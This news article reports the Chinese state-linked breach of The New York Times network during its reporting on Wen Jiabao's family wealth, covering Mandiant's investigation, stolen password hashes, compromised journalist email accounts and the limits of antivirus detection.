New York Times computer network breached by Chinese hackers, paper says

Hackers from China breached the computer network of The New York Times and stole passwords that allowed them to gain access to computers and email accounts for a period of four months, the newspaper reported late Wednesday.

The initial intrusion happened sometime around Sept. 13 while the Times reporters were working on a story about the multibillion-dollar fortune accumulated by relatives of China's Prime Minister Wen Jiabao, the Times report said.

It's not clear how hackers originally gained access to the Times' network, but computer forensics experts from IT security firm Mandiant, which was contracted to investigate the incident, believe that the organization's employees might have been targeted via spear phishing -- an attack technique that involves sending specifically crafted email messages with malicious links or attachments.

The hackers' activity on the network increased after the story about the Chinese prime minister's relatives and their wealth was published in late October, the Times said. The newspaper was aware of warnings from Chinese officials that investigating Wen's relatives would have consequences, the Times said.

AT&T was asked by the Times to monitor its computer network for suspicious activity and started seeing behavior consistent with cyberattacks believed to be associated with the Chinese military on Oct. 25. After learning of this activity, the Times briefed the FBI and tried to eliminate the attackers from its systems.

However, on Nov. 7 it became clear that the hackers still had a foothold on some of the systems and the newspaper contracted Mandiant. This marked the beginning of a larger investigation that involved monitoring how the attackers moved around the network for several months in order to learn their habits and discover all backdoors they might have installed.

The Mandiant investigators established that the hackers had stole usernames and password hashes for all Times employees from the network's domain controller and used them to gain access to the computers of 53 employees.

The hackers were also able to access the email accounts of David Barboza, the Times' Shanghai bureau chief who wrote the story about Wen Jiabao's relatives, and Jim Yardley, the Times' South Asia bureau chief in India.

The main target of the attackers appears to have been Barboza's email correspondence and documents related to the investigation he performed for that story, the Times report said. Marc Frons, the Times' chief information office, said that the hackers could have wreaked havoc on the organization's systems, but they were not interested in doing that.

Mandiant's investigators believe the attackers are part of a known Chinese hacker group specialized in APT (advanced persistent threat) attacks that previously targeted other Western organizations and American military contractors. The group routed their attacks through compromised computers owned by universities in North Carolina, Arizona, Wisconsin and New Mexico, as well as computers owned by small U.S. companies and Internet service providers.

The attacks might be part of a larger campaign targeting journalists, the Times said, citing a December intelligence report from Mandiant that mentioned APT-style attacks against 30 journalists and executives at Western news outlets.

Mandiant did not immediately respond to a request for more information about the attacks.

According to the Times report, Mandiant investigators determined that hackers used 45 pieces of custom malware in the attacks against the New York Times over three months, but only one of them was detected by the antivirus products from Symantec used by the newspaper on its systems.

Advanced attacks like the one described in the New York Times article "underscore how important it is for companies, countries and consumers to make sure they are using the full capability of security solutions," Symantec said Thursday in a statement sent via email.

"The advanced capabilities in our endpoint offerings, including our unique reputation-based technology and behavior-based blocking, specifically target sophisticated attacks," the company said. "Turning on only the signature-based anti-virus components of endpoint solutions alone are not enough in a world that is changing daily from attacks and threats. We encourage customers to be very aggressive in deploying solutions that offer a combined approach to security. Anti-virus software alone is not enough."

News of this attack comes on the heels of a recent debate among security and antivirus experts regarding the efficiency of desktop antivirus products at detecting new threats that don't have a widespread distribution, like the type of malware used in APT attacks. The discussion was prompted by a study released by security firm Imperva in December, which concluded that newly created threats have an initial antivirus detection rate of under 5 percent.

Even though the methodology used in the study was heavily criticized as being flawed and inaccurate, some experts strongly believe that desktop antivirus products are incapable of detecting the custom malware used today in targeted attacks against organizations.

"From my own experience, within corporate/enterprise networks, desktop antivirus detection typically hovers at 1-2% for the threats that make it through the various network defenses," Gunter Ollmann, the chief technology officer at security consultancy firm IOActive said earlier this month in a blog post. "For newly minted malware that is designed to target corporate victims, the rate is pretty much 0% and can remain that way for hundreds of days after the malware has been released into the wild."